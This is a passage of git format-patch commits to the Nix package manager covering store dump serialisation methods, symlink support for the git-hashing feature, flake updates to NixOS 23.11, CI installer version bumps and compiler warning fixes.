-        case FileIngestionMethod::Git:
-        {
-            git::dump(
-                accessor, path,
-                sink,
-                // recursively add to store if path is a directory
-                [&](const CanonPath & path) -> git::TreeEntry {
-                    auto storePath = addToStore("git", accessor, path, method, hashAlgo, references, filter, repair);
-                    auto info = queryPathInfo(storePath);
-                    assert(info->ca);
-                    assert(info->ca->method == FileIngestionMethod::Git);
-                    auto stat = getFSAccessor()->lstat(CanonPath(printStorePath(storePath)));
-                    auto gitModeOpt = git::convertMode(stat.type);
-                    assert(gitModeOpt);
-                    return {
-                        .mode = *gitModeOpt,
-                        .hash = info->ca->hash,
-                    };
-                },
-                filter);
-            break;
-        }
-        }
+        dumpPath(accessor, path, sink, fsm, filter);
     });
-    return addToStoreFromDump(*source, name, method, hashAlgo, references, repair);
+    return addToStoreFromDump(*source, name, fsm, method, hashAlgo, references, repair);
 }
 
 void Store::addMultipleToStore(
diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh
index 5163070b2..5f683a211 100644
--- a/src/libstore/store-api.hh
+++ b/src/libstore/store-api.hh
@@ -466,14 +466,23 @@ public:
      * in `dump`, which is either a NAR serialisation (if recursive ==
      * true) or simply the contents of a regular file (if recursive ==
      * false).
-     * `dump` may be drained
      *
-     * \todo remove?
+     * `dump` may be drained.
+     *
+     * @param dumpMethod What serialisation format is `dump`, i.e. how
+     * to deserialize it. Must either match hashMethod or be
+     * `FileSerialisationMethod::Recursive`.
+     *
+     * @param hashMethod How content addressing? Need not match be the
+     * same as `dumpMethod`.
+     *
+     * @todo remove?
      */
     virtual StorePath addToStoreFromDump(
         Source & dump,
         std::string_view name,
-        ContentAddressMethod method = FileIngestionMethod::Recursive,
+        FileSerialisationMethod dumpMethod = FileSerialisationMethod::Recursive,
+        ContentAddressMethod hashMethod = FileIngestionMethod::Recursive,
         HashAlgorithm hashAlgo = HashAlgorithm::SHA256,
         const StorePathSet & references = StorePathSet(),
         RepairFlag repair = NoRepair) = 0;
@@ -772,7 +781,7 @@ protected:
      * Helper for methods that are not unsupported: this is used for
      * default definitions for virtual methods that are meant to be overriden.
      *
-     * \todo Using this should be a last resort. It is better to make
+     * @todo Using this should be a last resort. It is better to make
      * the method "virtual pure" and/or move it to a subclass.
      */
     [[noreturn]] void unsupported(const std::string & op)
diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc
index 2f9c988d5..8bebe2b9e 100644
--- a/src/nix-env/user-env.cc
+++ b/src/nix-env/user-env.cc
@@ -113,7 +113,7 @@ bool createUserEnv(EvalState & state, PackageInfos & elems,
         std::string str2 = str.str();
         StringSource source { str2 };
         state.store->addToStoreFromDump(
-            source, "env-manifest.nix", TextIngestionMethod {}, HashAlgorithm::SHA256, references);
+            source, "env-manifest.nix", FileSerialisationMethod::Flat, TextIngestionMethod {}, HashAlgorithm::SHA256, references);
     });
 
     /* Get the environment builder expression. */
diff --git a/src/nix/develop.cc b/src/nix/develop.cc
index 403178a5d..c1842f2d5 100644
--- a/src/nix/develop.cc
+++ b/src/nix/develop.cc
@@ -226,7 +226,7 @@ static StorePath getDerivationEnvironment(ref store, ref evalStore
     auto getEnvShPath = ({
         StringSource source { getEnvSh };
         evalStore->addToStoreFromDump(
-            source, "get-env.sh", TextIngestionMethod {}, HashAlgorithm::SHA256, {});
+            source, "get-env.sh", FileSerialisationMethod::Flat, TextIngestionMethod {}, HashAlgorithm::SHA256, {});
     });
 
     drv.args = {store->printStorePath(getEnvShPath)};

From 44f10f000a13fae6baae9c10767c6d300ff689a8 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Tue, 27 Feb 2024 13:45:18 +0100
Subject: [PATCH 526/654] flake: Update to NixOS 23.11

About time :)

This required disabling `bear` on darwin as it's currently broken (fixed
on master, but not yet on 23.11).
---
 flake.lock  |  8 ++++----
 flake.nix   | 18 +++++-------------
 package.nix |  2 +-
 3 files changed, 10 insertions(+), 18 deletions(-)

diff --git a/flake.lock b/flake.lock
index f0efb4036..a9022dbdc 100644
--- a/flake.lock
+++ b/flake.lock
@@ -34,16 +34,16 @@
     },
     "nixpkgs": {
       "locked": {
-        "lastModified": 1705033721,
-        "narHash": "sha256-K5eJHmL1/kev6WuqyqqbS1cdNnSidIZ3jeqJ7GbrYnQ=",
+        "lastModified": 1708971694,
+        "narHash": "sha256-mBXQ65IrCJbNgTrj0+6xdXpD9/U31AWPKdwGlOufhtI=",
         "owner": "NixOS",
         "repo": "nixpkgs",
-        "rev": "a1982c92d8980a0114372973cbdfe0a307f1bdea",
+        "rev": "4dd376f7943c64b522224a548d9cab5627b4d9d6",
         "type": "github"
       },
       "original": {
         "owner": "NixOS",
-        "ref": "nixos-23.05-small",
+        "ref": "nixos-23.11-small",
         "repo": "nixpkgs",
         "type": "github"
       }
diff --git a/flake.nix b/flake.nix
index 0bc70768e..479ec05c0 100644
--- a/flake.nix
+++ b/flake.nix
@@ -1,7 +1,7 @@
 {
   description = "The purely functional package manager";
 
-  inputs.nixpkgs.url = "github:NixOS/nixpkgs/nixos-23.05-small";
+  inputs.nixpkgs.url = "github:NixOS/nixpkgs/nixos-23.11-small";
   inputs.nixpkgs-regression.url = "github:NixOS/nixpkgs/215d4d0fd80ca5163643b03a33fde804a29cc1e2";
   inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; };
   inputs.libgit2 = { url = "github:libgit2/libgit2"; flake = false; };
@@ -10,20 +10,10 @@
 
     let
       inherit (nixpkgs) lib;
-
-      # Experimental fileset library: https://github.com/NixOS/nixpkgs/pull/222981
-      # Not an "idiomatic" flake input because:
-      #  - Propagation to dependent locks: https://github.com/NixOS/nix/issues/7730
-      #  - Subflake would download redundant and huge parent flake
-      #  - No git tree hash support: https://github.com/NixOS/nix/issues/6044
-      inherit (import (builtins.fetchTarball { url = "https://github.com/NixOS/nix/archive/1bdcd7fc8a6a40b2e805bad759b36e64e911036b.tar.gz"; sha256 = "sha256:14ljlpdsp4x7h1fkhbmc4bd3vsqnx8zdql4h3037wh09ad6a0893"; }))
-        fileset;
+      inherit (lib) fileset;
 
       officialRelease = false;
 
-      # Set to true to build the release notes for the next release.
-      buildUnreleasedNotes = false;
-
       version = lib.fileContents ./.version + versionSuffix;
       versionSuffix =
         if officialRelease
@@ -405,7 +395,9 @@
             XDG_DATA_DIRS+=:$out/share
           '';
           nativeBuildInputs = attrs.nativeBuildInputs or []
-            ++ lib.optional stdenv.cc.isClang pkgs.buildPackages.bear
+            # TODO: Remove the darwin check once
+            # https://github.com/NixOS/nixpkgs/pull/291814 is available
+            ++ lib.optional (stdenv.cc.isClang && !stdenv.isDarwin) pkgs.buildPackages.bear
             ++ lib.optional (stdenv.cc.isClang && stdenv.hostPlatform == stdenv.buildPlatform) pkgs.buildPackages.clang-tools;
         });
         in
diff --git a/package.nix b/package.nix
index 1f895e301..20796a386 100644
--- a/package.nix
+++ b/package.nix
@@ -154,7 +154,7 @@ in {
     in
       fileset.toSource {
         root = ./.;
-        fileset = fileset.intersect baseFiles (fileset.unions ([
+        fileset = fileset.intersection baseFiles (fileset.unions ([
           # For configure
           ./.version
           ./configure.ac

From bbef03872b64da2b65fc7dd2040e1e3f5257bea7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Tue, 27 Feb 2024 14:40:12 +0100
Subject: [PATCH 527/654] Bump the required daemon version for the impure-env
 test

The required version check was a bit too lenient, and
`nixpkgs#nixUnstable` was considered valid while it didn't have the fix.
---
 tests/functional/impure-env.sh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tests/functional/impure-env.sh b/tests/functional/impure-env.sh
index d9e4a34a2..cfea4cae9 100644
--- a/tests/functional/impure-env.sh
+++ b/tests/functional/impure-env.sh
@@ -1,7 +1,7 @@
 source common.sh
 
 # Needs the config option 'impure-env' to work
-requireDaemonNewerThan "2.18.0pre20230816"
+requireDaemonNewerThan "2.19.0"
 
 enableFeatures "configurable-impure-env"
 restartDaemon

From a0cb75d96f76a3be48b9319e26d8ad78ef4e4525 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Tue, 27 Feb 2024 18:45:51 +0100
Subject: [PATCH 528/654] Disable bear on all the things with darwin as
 hostPlatform

Just `stdenv.isDarwin` isn't enough because it doesn't apply to the
build platform, which mean that cross packages building from darwin to
another platform will have `isDarwin` set to false.
Replace it by `stdenv.buildPlatform.isDarwin`.
---
 flake.nix | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/flake.nix b/flake.nix
index 479ec05c0..baf81007f 100644
--- a/flake.nix
+++ b/flake.nix
@@ -397,7 +397,7 @@
           nativeBuildInputs = attrs.nativeBuildInputs or []
             # TODO: Remove the darwin check once
             # https://github.com/NixOS/nixpkgs/pull/291814 is available
-            ++ lib.optional (stdenv.cc.isClang && !stdenv.isDarwin) pkgs.buildPackages.bear
+            ++ lib.optional (stdenv.cc.isClang && !stdenv.buildPlatform.isDarwin) pkgs.buildPackages.bear
             ++ lib.optional (stdenv.cc.isClang && stdenv.hostPlatform == stdenv.buildPlatform) pkgs.buildPackages.clang-tools;
         });
         in

From cf3ef060ff7623c006e09ff51ba0f6d4e7bba704 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Tue, 27 Feb 2024 19:24:31 +0100
Subject: [PATCH 529/654] =?UTF-8?q?Disable=20the=20=E2=80=9Cstatic?=
 =?UTF-8?q?=E2=80=9D=20darwin=20stdenvs?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Don't evaluate, and probably not really useful (if at all)
---
 flake.nix | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/flake.nix b/flake.nix
index baf81007f..ceb572c0b 100644
--- a/flake.nix
+++ b/flake.nix
@@ -409,8 +409,9 @@
               (forAllStdenvs (stdenvName: makeShell pkgs pkgs.${stdenvName}));
           in
             (makeShells "native" nixpkgsFor.${system}.native) //
-            (makeShells "static" nixpkgsFor.${system}.static) //
-            (lib.genAttrs shellCrossSystems (crossSystem: let pkgs = nixpkgsFor.${system}.cross.${crossSystem}; in makeShell pkgs pkgs.stdenv)) //
+            (lib.optionalAttrs (!nixpkgsFor.${system}.native.stdenv.isDarwin)
+              (makeShells "static" nixpkgsFor.${system}.static)) //
+              (lib.genAttrs shellCrossSystems (crossSystem: let pkgs = nixpkgsFor.${system}.cross.${crossSystem}; in makeShell pkgs pkgs.stdenv)) //
             {
               default = self.devShells.${system}.native-stdenvPackages;
             }

From 945940f2efe273084319790f72a61b6b446d2882 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 28 Feb 2024 02:31:19 +0100
Subject: [PATCH 530/654] nixpkgs: nixos-23.11-small -> release-23.11
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Flake lock file updates:

• Updated input 'nixpkgs':
    'github:NixOS/nixpkgs/4dd376f7943c64b522224a548d9cab5627b4d9d6' (2024-02-26)
  → 'github:NixOS/nixpkgs/b550fe4b4776908ac2a861124307045f8e717c8e' (2024-02-28)
---
 flake.lock | 9 +++++----
 flake.nix  | 4 +++-
 2 files changed, 8 insertions(+), 5 deletions(-)

diff --git a/flake.lock b/flake.lock
index a9022dbdc..3070b4a45 100644
--- a/flake.lock
+++ b/flake.lock
@@ -34,16 +34,17 @@
     },
     "nixpkgs": {
       "locked": {
-        "lastModified": 1708971694,
-        "narHash": "sha256-mBXQ65IrCJbNgTrj0+6xdXpD9/U31AWPKdwGlOufhtI=",
+        "lastModified": 1709083642,
+        "narHash": "sha256-7kkJQd4rZ+vFrzWu8sTRtta5D1kBG0LSRYAfhtmMlSo=",
         "owner": "NixOS",
         "repo": "nixpkgs",
-        "rev": "4dd376f7943c64b522224a548d9cab5627b4d9d6",
+        "rev": "b550fe4b4776908ac2a861124307045f8e717c8e",
+        "treeHash": "74223e48f0b0e94ecf419d793c67068cdfdf5ea0",
         "type": "github"
       },
       "original": {
         "owner": "NixOS",
-        "ref": "nixos-23.11-small",
+        "ref": "release-23.11",
         "repo": "nixpkgs",
         "type": "github"
       }
diff --git a/flake.nix b/flake.nix
index ceb572c0b..58d17bf00 100644
--- a/flake.nix
+++ b/flake.nix
@@ -1,7 +1,9 @@
 {
   description = "The purely functional package manager";
 
-  inputs.nixpkgs.url = "github:NixOS/nixpkgs/nixos-23.11-small";
+  # TODO switch to nixos-23.11-small
+  #      https://nixpk.gs/pr-tracker.html?pr=291954
+  inputs.nixpkgs.url = "github:NixOS/nixpkgs/release-23.11";
   inputs.nixpkgs-regression.url = "github:NixOS/nixpkgs/215d4d0fd80ca5163643b03a33fde804a29cc1e2";
   inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; };
   inputs.libgit2 = { url = "github:libgit2/libgit2"; flake = false; };

From 8dc4b41c7f748d1615dbcf2c3438d1a76a5cb295 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 28 Feb 2024 02:34:43 +0100
Subject: [PATCH 531/654] flake.lock: Strip out treeHash. Too soon...

I hate this.
We should have it, but for now we can't.
---
 flake.lock | 1 -
 1 file changed, 1 deletion(-)

diff --git a/flake.lock b/flake.lock
index 3070b4a45..bb2e400c0 100644
--- a/flake.lock
+++ b/flake.lock
@@ -39,7 +39,6 @@
         "owner": "NixOS",
         "repo": "nixpkgs",
         "rev": "b550fe4b4776908ac2a861124307045f8e717c8e",
-        "treeHash": "74223e48f0b0e94ecf419d793c67068cdfdf5ea0",
         "type": "github"
       },
       "original": {

From 6147d27afb7200b972338abf1be1523740773df9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Wed, 28 Feb 2024 07:10:53 +0100
Subject: [PATCH 532/654] Bump the required daemon version for the git hashing
 tests

The required version check was a bit too lenient, and
`nixpkgs#nixUnstable` was considered valid while it didn't have the fix.
---
 tests/functional/git-hashing/common.sh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tests/functional/git-hashing/common.sh b/tests/functional/git-hashing/common.sh
index 5de96e74f..572cea438 100644
--- a/tests/functional/git-hashing/common.sh
+++ b/tests/functional/git-hashing/common.sh
@@ -4,7 +4,7 @@ clearStore
 clearCache
 
 # Need backend to support git-hashing too
-requireDaemonNewerThan "2.18.0pre20230908"
+requireDaemonNewerThan "2.19"
 
 enableFeatures "git-hashing"
 

From da90be789d8074880d95405a439b446c60947506 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Wed, 28 Feb 2024 08:00:17 +0100
Subject: [PATCH 533/654] Fix a too smart implicit cast

Apparently gcc is able to implicitly cast from `FileIngestionMethod` to
`ContentAddressMethod`, but clang isn't. So explicit the cast
---
 src/libstore/local-store.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc
index 56f8c5dd8..1bbeaa912 100644
--- a/src/libstore/local-store.cc
+++ b/src/libstore/local-store.cc
@@ -1202,7 +1202,7 @@ StorePath LocalStore::addToStoreFromDump(
     Path tempDir;
     AutoCloseFD tempDirFd;
 
-    bool methodsMatch = (FileIngestionMethod) dumpMethod == hashMethod;
+    bool methodsMatch = ContentAddressMethod(FileIngestionMethod(dumpMethod)) == hashMethod;
 
     /* If the methods don't match, our streaming hash of the dump is the
        wrong sort, and we need to rehash. */

From f6142cd0d1b248581adddbbc1056df00fe12eb3b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Wed, 28 Feb 2024 08:02:49 +0100
Subject: [PATCH 534/654] unset `NIX_HARDENING_ENABLE` in fast build mode

`NIX_HARDENING_ENABLE` causes `_FORTIFY_SOURCE` to be defined.
This isn't compatible with `-O0`, and the compiler will happily remind
us about it at every call, spamming the terminal with warnings and stack
traces.

We don't really care hardening in that case, so just disable it if we
pass `OPTIMIZE=0`.
---
 Makefile  | 1 +
 flake.nix | 1 +
 2 files changed, 2 insertions(+)

diff --git a/Makefile b/Makefile
index 745e60aa5..c3dc83c77 100644
--- a/Makefile
+++ b/Makefile
@@ -68,6 +68,7 @@ ifeq ($(OPTIMIZE), 1)
   GLOBAL_LDFLAGS += $(CXXLTO)
 else
   GLOBAL_CXXFLAGS += -O0 -U_FORTIFY_SOURCE
+  unexport NIX_HARDENING_ENABLE
 endif
 
 include mk/platform.mk
diff --git a/flake.nix b/flake.nix
index 58d17bf00..42aaace67 100644
--- a/flake.nix
+++ b/flake.nix
@@ -396,6 +396,7 @@
             # Make bash completion work.
             XDG_DATA_DIRS+=:$out/share
           '';
+
           nativeBuildInputs = attrs.nativeBuildInputs or []
             # TODO: Remove the darwin check once
             # https://github.com/NixOS/nixpkgs/pull/291814 is available

From bcb5f235f963d3e213c3dbe104be91a9a0a6dd29 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Wed, 28 Feb 2024 10:56:07 -0500
Subject: [PATCH 535/654] Support symlinks properly with `git-hashing`
 experimental feature

Before, they would not be written to a file `FileSystemObjectSink`
correctly.
---
 src/libutil/git.cc                     |  75 +++++++++++++++++++------
 src/libutil/git.hh                     |  21 ++++++-
 tests/functional/git-hashing/simple.sh |   9 +++
 tests/unit/libutil/data/git/tree.bin   | Bin 100 -> 133 bytes
 tests/unit/libutil/data/git/tree.txt   |   1 +
 tests/unit/libutil/git.cc              |  30 ++++++++--
 6 files changed, 110 insertions(+), 26 deletions(-)

diff --git a/src/libutil/git.cc b/src/libutil/git.cc
index 5733531fa..0b6e35222 100644
--- a/src/libutil/git.cc
+++ b/src/libutil/git.cc
@@ -56,31 +56,63 @@ void parseBlob(
     FileSystemObjectSink & sink,
     const Path & sinkPath,
     Source & source,
-    bool executable,
+    BlobMode blobMode,
     const ExperimentalFeatureSettings & xpSettings)
 {
     xpSettings.require(Xp::GitHashing);
 
-    sink.createRegularFile(sinkPath, [&](auto & crf) {
-        if (executable)
-            crf.isExecutable();
+    unsigned long long size = std::stoi(getStringUntil(source, 0));
 
-        unsigned long long size = std::stoi(getStringUntil(source, 0));
+    auto doRegularFile = [&](bool executable) {
+        sink.createRegularFile(sinkPath, [&](auto & crf) {
+            if (executable)
+                crf.isExecutable();
 
-        crf.preallocateContents(size);
+            crf.preallocateContents(size);
 
-        unsigned long long left = size;
-        std::string buf;
-        buf.reserve(65536);
+            unsigned long long left = size;
+            std::string buf;
+            buf.reserve(65536);
 
-        while (left) {
+            while (left) {
+                checkInterrupt();
+                buf.resize(std::min((unsigned long long)buf.capacity(), left));
+                source(buf);
+                crf(buf);
+                left -= buf.size();
+            }
+        });
+    };
+
+    switch (blobMode) {
+
+    case BlobMode::Regular:
+        doRegularFile(false);
+        break;
+
+    case BlobMode::Executable:
+        doRegularFile(true);
+        break;
+
+    case BlobMode::Symlink:
+    {
+        std::string target;
+        target.resize(size, '0');
+        target.reserve(size);
+        for (size_t n = 0; n < target.size();) {
             checkInterrupt();
-            buf.resize(std::min((unsigned long long)buf.capacity(), left));
-            source(buf);
-            crf(buf);
-            left -= buf.size();
+            n += source.read(
+                const_cast(target.c_str()) + n,
+                target.size() - n);
         }
-    });
+
+        sink.createSymlink(sinkPath, target);
+        break;
+    }
+
+    default:
+        assert(false);
+    }
 }
 
 void parseTree(
@@ -142,7 +174,7 @@ void parse(
     FileSystemObjectSink & sink,
     const Path & sinkPath,
     Source & source,
-    bool executable,
+    BlobMode rootModeIfBlob,
     std::function hook,
     const ExperimentalFeatureSettings & xpSettings)
 {
@@ -152,7 +184,7 @@ void parse(
 
     switch (type) {
     case ObjectType::Blob:
-        parseBlob(sink, sinkPath, source, executable, xpSettings);
+        parseBlob(sink, sinkPath, source, rootModeIfBlob, xpSettings);
         break;
     case ObjectType::Tree:
         parseTree(sink, sinkPath, source, hook, xpSettings);
@@ -177,7 +209,7 @@ std::optional convertMode(SourceAccessor::Type type)
 
 void restore(FileSystemObjectSink & sink, Source & source, std::function hook)
 {
-    parse(sink, "", source, false, [&](Path name, TreeEntry entry) {
+    parse(sink, "", source, BlobMode::Regular, [&](Path name, TreeEntry entry) {
         auto [accessor, from] = hook(entry.hash);
         auto stat = accessor->lstat(from);
         auto gotOpt = convertMode(stat.type);
@@ -275,6 +307,13 @@ Mode dump(
     }
 
     case SourceAccessor::tSymlink:
+    {
+        auto target = accessor.readLink(path);
+        dumpBlobPrefix(target.size(), sink, xpSettings);
+        sink(target);
+        return Mode::Symlink;
+    }
+
     case SourceAccessor::tMisc:
     default:
         throw Error("file '%1%' has an unsupported type", path);
diff --git a/src/libutil/git.hh b/src/libutil/git.hh
index d9eb138e1..cfea48fbe 100644
--- a/src/libutil/git.hh
+++ b/src/libutil/git.hh
@@ -75,10 +75,23 @@ ObjectType parseObjectType(
     Source & source,
     const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
 
+/**
+ * These 3 modes are represented by blob objects.
+ *
+ * Sometimes we need this information to disambiguate how a blob is
+ * being used to better match our own "file system object" data model.
+ */
+enum struct BlobMode : RawMode
+{
+    Regular = static_cast(Mode::Regular),
+    Executable = static_cast(Mode::Executable),
+    Symlink = static_cast(Mode::Symlink),
+};
+
 void parseBlob(
     FileSystemObjectSink & sink, const Path & sinkPath,
     Source & source,
-    bool executable,
+    BlobMode blobMode,
     const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
 
 void parseTree(
@@ -89,11 +102,15 @@ void parseTree(
 
 /**
  * Helper putting the previous three `parse*` functions together.
+ *
+ * @rootModeIfBlob How to interpret a root blob, for which there is no
+ * disambiguating dir entry to answer that questino. If the root it not
+ * a blob, this is ignored.
  */
 void parse(
     FileSystemObjectSink & sink, const Path & sinkPath,
     Source & source,
-    bool executable,
+    BlobMode rootModeIfBlob,
     std::function hook,
     const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
 
diff --git a/tests/functional/git-hashing/simple.sh b/tests/functional/git-hashing/simple.sh
index 74b0220f8..604e1a175 100644
--- a/tests/functional/git-hashing/simple.sh
+++ b/tests/functional/git-hashing/simple.sh
@@ -56,3 +56,12 @@ echo Run Hello World! > $TEST_ROOT/dummy3/dir/executable
 path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
 hash3=$(nix-store -q --hash $path3)
 test "$hash3" = "sha256:08y3nm3mvn9qvskqnf13lfgax5lh73krxz4fcjd5cp202ggpw9nv"
+
+rm -rf $TEST_ROOT/dummy3
+mkdir -p $TEST_ROOT/dummy3
+mkdir -p $TEST_ROOT/dummy3/dir
+touch $TEST_ROOT/dummy3/dir/file
+ln -s './hello/world.txt' $TEST_ROOT/dummy3/dir/symlink
+path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
+hash3=$(nix-store -q --hash $path3)
+test "$hash3" = "sha256:1dwazas8irzpar89s8k2bnp72imfw7kgg4aflhhsfnicg8h428f3"
diff --git a/tests/unit/libutil/data/git/tree.bin b/tests/unit/libutil/data/git/tree.bin
index 5256ec140702fef5f88bd5750caf7cd57c03e5ac..4ccd43e9a977a6c216f0fad5a15c30aaf20da778 100644
GIT binary patch
delta 30
jcmYdkW#lL+N=;QTG%}gU9?NZLWB>#Tg{7qt6AeWHezyoG

delta 14
VcmZo=Okpo6N=;R;G@8f}3jiOO1S0?d

diff --git a/tests/unit/libutil/data/git/tree.txt b/tests/unit/libutil/data/git/tree.txt
index be3d02920..cd40b6a55 100644
--- a/tests/unit/libutil/data/git/tree.txt
+++ b/tests/unit/libutil/data/git/tree.txt
@@ -1,3 +1,4 @@
 100644 blob 63ddb340119baf8492d2da53af47e8c7cfcd5eb2	Foo
 100755 blob 63ddb340119baf8492d2da53af47e8c7cfcd5eb2	bAr
 040000 tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904	baZ
+120000 blob 63ddb340119baf8492d2da53af47e8c7cfcd5eb2	quuX
diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc
index 76ef86bcf..4f92488d6 100644
--- a/tests/unit/libutil/git.cc
+++ b/tests/unit/libutil/git.cc
@@ -67,7 +67,7 @@ TEST_F(GitTest, blob_read) {
         StringSink out;
         RegularFileSink out2 { out };
         ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Blob);
-        parseBlob(out2, "", in, false, mockXpSettings);
+        parseBlob(out2, "", in, BlobMode::Regular, mockXpSettings);
 
         auto expected = readFile(goldenMaster("hello-world.bin"));
 
@@ -115,6 +115,15 @@ const static Tree tree = {
             .hash = Hash::parseAny("4b825dc642cb6eb9a060e54bf8d69288fbee4904", HashAlgorithm::SHA1),
         },
     },
+    {
+        "quuX",
+        {
+            .mode = Mode::Symlink,
+            // hello world with special chars from above (symlink target
+            // can be anything)
+            .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1),
+        },
+    },
 };
 
 TEST_F(GitTest, tree_read) {
@@ -165,6 +174,12 @@ TEST_F(GitTest, both_roundrip) {
                                 .contents = "good day,\n\0\n\tworld!",
                             },
                         },
+                        {
+                            "quux",
+                            File::Symlink {
+                                .target = "/over/there",
+                            },
+                        },
                     },
                 },
             },
@@ -195,21 +210,24 @@ TEST_F(GitTest, both_roundrip) {
 
     MemorySink sinkFiles2 { files2 };
 
-    std::function mkSinkHook;
-    mkSinkHook = [&](auto prefix, auto & hash, auto executable) {
+    std::function mkSinkHook;
+    mkSinkHook = [&](auto prefix, auto & hash, auto blobMode) {
         StringSource in { cas[hash] };
         parse(
-            sinkFiles2, prefix, in, executable,
+            sinkFiles2, prefix, in, blobMode,
             [&](const Path & name, const auto & entry) {
                 mkSinkHook(
                     prefix + "/" + name,
                     entry.hash,
-                    entry.mode == Mode::Executable);
+                    // N.B. this cast would not be acceptable in real
+                    // code, because it would make an assert reachable,
+                    // but it should harmless in this test.
+                    static_cast(entry.mode));
             },
             mockXpSettings);
     };
 
-    mkSinkHook("", root.hash, false);
+    mkSinkHook("", root.hash, BlobMode::Regular);
 
     ASSERT_EQ(files, files2);
 }

From 4d769e7a76bee1e8c967f20d72eb5f3a357577ee Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 28 Feb 2024 19:54:17 +0100
Subject: [PATCH 536/654] actions docker_push_image: Update nix 2.13.3 ->
 2.20.3

---
 .github/workflows/ci.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 38126dd68..2aa3a3300 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -64,7 +64,7 @@ jobs:
     - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV
     - uses: cachix/install-nix-action@v25
       with:
-        install_url: https://releases.nixos.org/nix/nix-2.13.3/install
+        install_url: https://releases.nixos.org/nix/nix-2.20.3/install
     - uses: cachix/cachix-action@v14
       with:
         name: '${{ env.CACHIX_NAME }}'
@@ -116,7 +116,7 @@ jobs:
         fetch-depth: 0
     - uses: cachix/install-nix-action@v25
       with:
-        install_url: https://releases.nixos.org/nix/nix-2.13.3/install
+        install_url: https://releases.nixos.org/nix/nix-2.20.3/install
     - run: echo CACHIX_NAME="$(echo $GITHUB_REPOSITORY-install-tests | tr "[A-Z]/" "[a-z]-")" >> $GITHUB_ENV
     - run: echo NIX_VERSION="$(nix --experimental-features 'nix-command flakes' eval .\#default.version | tr -d \")" >> $GITHUB_ENV
     - uses: cachix/cachix-action@v14

From f6158ea53b90a60899ee8171c04dc1f978fb8723 Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Mon, 26 Feb 2024 00:30:51 -0800
Subject: [PATCH 537/654] finally.hh: include works by itself; mark as
 nodiscard

---
 src/libutil/finally.hh | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/src/libutil/finally.hh b/src/libutil/finally.hh
index db654301f..4cae20a36 100644
--- a/src/libutil/finally.hh
+++ b/src/libutil/finally.hh
@@ -1,11 +1,13 @@
 #pragma once
 ///@file
 
+#include 
+
 /**
  * A trivial class to run a function at the end of a scope.
  */
 template
-class Finally
+class [[nodiscard("Finally values must be used")]] Finally
 {
 private:
     Fn fun;

From 65bb12ba78c7cef975515e025c72cf68b7e738b3 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Wed, 28 Feb 2024 22:59:20 +0100
Subject: [PATCH 538/654] Fix gcc 12 warnings

---
 src/libstore/build-result.hh                | 5 +++++
 src/libstore/build/local-derivation-goal.cc | 1 +
 src/libstore/daemon.cc                      | 2 ++
 src/libstore/remote-store.cc                | 2 ++
 src/libutil/file-content-address.cc         | 2 +-
 5 files changed, 11 insertions(+), 1 deletion(-)

diff --git a/src/libstore/build-result.hh b/src/libstore/build-result.hh
index 8840fa7e3..3636ad3a4 100644
--- a/src/libstore/build-result.hh
+++ b/src/libstore/build-result.hh
@@ -123,6 +123,11 @@ struct KeyedBuildResult : BuildResult
      * The derivation we built or the store path we substituted.
      */
     DerivedPath path;
+
+    // Hack to work around a gcc "may be used uninitialized" warning.
+    KeyedBuildResult(BuildResult res, DerivedPath path)
+        : BuildResult(std::move(res)), path(std::move(path))
+    { }
 };
 
 }
diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index a9b8de123..c7a658361 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
